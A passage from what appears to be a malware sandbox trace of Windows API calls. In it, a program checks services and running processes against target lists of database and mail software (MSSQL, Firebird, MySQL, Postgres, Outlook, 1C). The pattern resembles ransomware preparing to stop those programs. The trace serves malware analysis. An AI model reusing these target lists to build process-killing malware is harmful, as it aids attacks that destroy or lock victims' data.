lpString2="PcaSvc") returned 1 [0036.280] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0036.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0036.280] lstrlenW (lpString="PlugPlay") returned 8 [0036.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0036.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0036.280] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0036.280] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0036.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0036.280] lstrlenW (lpString="Power") returned 5 [0036.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0036.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0036.280] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0036.280] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0036.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0036.281] lstrlenW (lpString="ProfSvc") returned 7 [0036.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0036.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0036.281] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0036.281] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0036.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0036.281] lstrlenW (lpString="RpcEptMapper") returned 12 [0036.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.281] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0036.281] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0036.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0036.281] lstrlenW (lpString="RpcSs") returned 5 [0036.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0036.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0036.281] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0036.281] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0036.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0036.281] lstrlenW (lpString="SamSs") returned 5 [0036.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0036.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0036.281] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0036.281] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0036.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0036.281] lstrlenW (lpString="Schedule") returned 8 [0036.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0036.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0036.281] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0036.281] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0036.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0036.281] lstrlenW (lpString="SENS") returned 4 [0036.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0036.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0036.281] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0036.281] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0036.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0036.282] lstrlenW (lpString="ShellHWDetection") returned 16 [0036.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.282] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0036.282] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0036.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0036.282] lstrlenW (lpString="Spooler") returned 7 [0036.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0036.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0036.282] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0036.282] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0036.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0036.282] lstrlenW (lpString="SysMain") returned 7 [0036.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0036.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0036.282] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0036.282] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0036.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0036.282] lstrlenW (lpString="Themes") returned 6 [0036.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0036.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0036.282] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0036.282] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0036.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0036.282] lstrlenW (lpString="TrkWks") returned 6 [0036.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0036.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0036.282] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0036.282] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0036.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0036.282] lstrlenW (lpString="UxSms") returned 5 [0036.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0036.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0036.282] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0036.283] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0036.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0036.283] lstrlenW (lpString="VSS") returned 3 [0036.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0036.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0036.283] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0036.283] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0036.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0036.283] lstrlenW (lpString="WdiServiceHost") returned 14 [0036.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.283] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0036.283] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0036.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0036.283] lstrlenW (lpString="WdiSystemHost") returned 13 [0036.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.283] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0036.283] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0036.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0036.283] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0036.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.283] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0036.283] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0036.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0036.283] lstrlenW (lpString="Winmgmt") returned 7 [0036.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0036.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0036.283] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0036.283] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0036.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0036.283] lstrlenW (lpString="WPDBusEnum") returned 10 [0036.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.284] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0036.284] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0036.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0036.284] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63e060 | out: hHeap=0x5f0000) returned 1 [0036.284] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c0 [0036.286] Process32FirstW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0036.286] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0036.287] lstrlenW (lpString="System") returned 6 [0036.287] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0036.287] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0036.287] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0036.287] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0036.287] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0036.287] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0036.287] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0036.287] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0036.288] lstrlenW (lpString="smss.exe") returned 8 [0036.288] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0036.288] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0036.288] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0036.288] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0036.288] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0036.288] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0036.288] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0036.288] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.289] lstrlenW (lpString="csrss.exe") returned 9 [0036.289] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.289] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0036.289] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.289] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0036.289] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.289] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.289] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.289] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0036.290] lstrlenW (lpString="wininit.exe") returned 11 [0036.290] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0036.290] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0036.290] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0036.290] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0036.290] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0036.290] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0036.290] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0036.290] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.291] lstrlenW (lpString="csrss.exe") returned 9 [0036.291] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.291] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0036.292] lstrlenW (lpString="winlogon.exe") returned 12 [0036.292] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0036.293] lstrlenW (lpString="services.exe") returned 12 [0036.293] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0036.293] lstrlenW (lpString="lsass.exe") returned 9 [0036.293] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0036.294] lstrlenW (lpString="lsm.exe") returned 7 [0036.294] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.295] lstrlenW (lpString="svchost.exe") returned 11 [0036.295] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.296] lstrlenW (lpString="svchost.exe") returned 11 [0036.296] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.296] lstrlenW (lpString="svchost.exe") returned 11 [0036.296] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.297] lstrlenW (lpString="svchost.exe") returned 11 [0036.297] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.298] lstrlenW (lpString="svchost.exe") returned 11 [0036.298] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0036.299] lstrlenW (lpString="audiodg.exe") returned 11 [0036.299] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.302] lstrlenW (lpString="svchost.exe") returned 11 [0036.302] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.303] lstrlenW (lpString="svchost.exe") returned 11 [0036.303] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0036.303] lstrlenW (lpString="dwm.exe") returned 7 [0036.303] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0036.304] lstrlenW (lpString="explorer.exe") returned 12 [0036.304] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0036.305] lstrlenW (lpString="spoolsv.exe") returned 11 [0036.305] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.306] lstrlenW (lpString="taskhost.exe") returned 12 [0036.306] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.307] lstrlenW (lpString="svchost.exe") returned 11 [0036.307] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0036.307] lstrlenW (lpString="taskeng.exe") returned 11 [0036.307] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.308] lstrlenW (lpString="taskhost.exe") returned 12 [0036.308] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0036.309] lstrlenW (lpString="entrepreneur.exe") returned 16 [0036.309] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0036.310] lstrlenW (lpString="andrew kinds.exe") returned 16 [0036.310] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0036.310] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0036.310] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0036.311] lstrlenW (lpString="educated.exe") returned 12 [0036.311] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0036.312] lstrlenW (lpString="servers.exe") returned 11 [0036.312] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0036.313] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0036.313] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0036.313] lstrlenW (lpString="gbp_chair.exe") returned 13 [0036.313] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0036.314] lstrlenW (lpString="attention infected.exe") returned 22 [0036.314] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0036.315] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0036.477] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0036.478] lstrlenW (lpString="pattern amateur.exe") returned 19 [0036.478] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0036.479] lstrlenW (lpString="referral.exe") returned 12 [0036.479] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0036.480] lstrlenW (lpString="copyingseems.exe") returned 16 [0036.480] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0036.480] lstrlenW (lpString="spin generally.exe") returned 18 [0036.480] Process32NextW (in: hSnapshot=0x1c0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, 